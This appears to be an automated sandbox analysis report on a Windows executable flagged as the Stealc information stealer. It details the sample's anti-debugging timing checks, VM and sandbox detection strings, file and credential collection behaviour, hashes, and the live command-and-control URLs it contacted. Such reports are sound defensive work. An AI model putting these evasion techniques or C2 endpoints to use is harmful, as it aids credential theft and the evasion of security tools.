                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13789D2 second address: 13789F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F849CDA4206h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13789F4 second address: 13789F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378A86 second address: 1378A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378A8A second address: 1378AB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 js 00007F849C4F2DBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F849C4F2DA9h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378AB3 second address: 1378AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137A08B second address: 137A099 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F849C4F2D96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B8F2 second address: 137B930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F849CDA4207h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007F849CDA41F6h 0x00000012 jmp 00007F849CDA4205h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B930 second address: 137B934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D94B second address: 137D965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D965 second address: 137D98C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnc 00007F849C4F2D96h 0x0000000b pop esi 0x0000000c jmp 00007F849C4F2D9Fh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jp 00007F849C4F2D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D98C second address: 137D995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D995 second address: 137D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D99B second address: 137D99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513028A second address: 51302E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F849C4F2D9Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 call 00007F849C4F2D9Dh 0x00000019 mov bx, cx 0x0000001c pop ecx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F849C4F2DA5h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51302E7 second address: 51302EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51302EB second address: 51302F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130317 second address: 513031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513031D second address: 5130354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849C4F2D9Ch 0x00000008 call 00007F849C4F2DA2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 jmp 00007F849C4F2D9Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130354 second address: 5130358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130358 second address: 513038A instructions: 0x00000000 rdtsc 0x00000002 mov si, 3CADh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F849C4F2DA8h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 08CC7090h 0x0000001b mov cx, di 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F080 second address: 129F087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F087 second address: 129F091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F849C4F2D96h 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10F1BF1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12933CE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1291903 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10EF29A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1316D73 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EA38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E9E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EA4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E9ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EA3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E91160 GetSystemInfo,ExitProcess,0_2_00E91160
                Source: file.exe, file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2175832040.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2175832040.0000000000C15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2175832040.0000000000C15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13604
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13639
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E945C0 VirtualProtect ?,00000004,00000100,000000000_2_00E945C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9750 mov eax, dword ptr fs:[00000030h]0_2_00EA9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00EA78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00EA9600
                Source: file.exe, file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: isProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00EA7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00EA7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00EA7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00EA7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe44%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/true
                  		unknown
                  http://185.215.113.206/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/3file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.php-file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/e2b1563c6670f193.php/Dfile.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/Mfile.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2175832040.0000000000B9E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.206/e2b1563c6670f193.phplfile.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/wsfile.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/e2b1563c6670f193.php4file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/e2b1563c6670f193.phpTfile.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.215.113.206/e2b1563c6670f193.phptfile.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.215.113.206
                                        		unknownPortugal
                                        		206894WHOLESALECONNECTIONSNLtrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1542683
                                        Start date and time:2024-10-26 07:10:05 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:file.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 80%
                                        • Number of executed functions: 19
                                        • Number of non-executed functions: 85
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousLummaC, StealcBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206/e2b1563c6670f193.php
                                        zE8aZ90GHB.exeGet hashmaliciousAmadeyBrowse
                                        • 185.215.113.206/k8FppT/index.php

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                        • 185.215.113.16
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                        • 185.215.113.16
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206
                                        file.exeGet hashmaliciousLummaC, StealcBrowse
                                        • 185.215.113.16
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206
                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                        • 185.215.113.206
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.206
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 185.215.113.37

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        No created / dropped files found

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.948375836095765
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'830'912 bytes
                                        MD5:23f03176ddc56b4e531545aaf7394334
                                        SHA1:56dffc71067b0d3896a2fba82b320d8b7f18782e
                                        SHA256:da968f12344c3ccfdfa40421c3688c1761a2ff5054b353582022016e0a05fbe4
                                        SHA512:466ba8dbefa4c4756ad45f3b5da32ba11228700c51ede7cee8168b3ce13f15455484b25284094f2cae21be8342ee7df573068ce3e7640d980b972549f644f4ef
                                        SSDEEP:24576:qpVwz7bh0nI2hjdQD190xLYYt5h752LgX7oieKLo26JBAjfALrOuC6jczE47:qXJIIy9g5h752Ue92+BmAHOlS
                                        TLSH:CA8533720FD132F9C26CCBB788454E0B6690A9739CE2D60E3D2B572FAA9375B17444E4
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                        File Icon

                                        Icon Hash:00928e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0xa91000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                        Entrypoint Preview

                                        Instruction
                                        jmp 00007F849C70C6FAh
                                        bswap esi
                                        sbb eax, dword ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        jmp 00007F849C70E6F5h
                                        add byte ptr [ebx], al
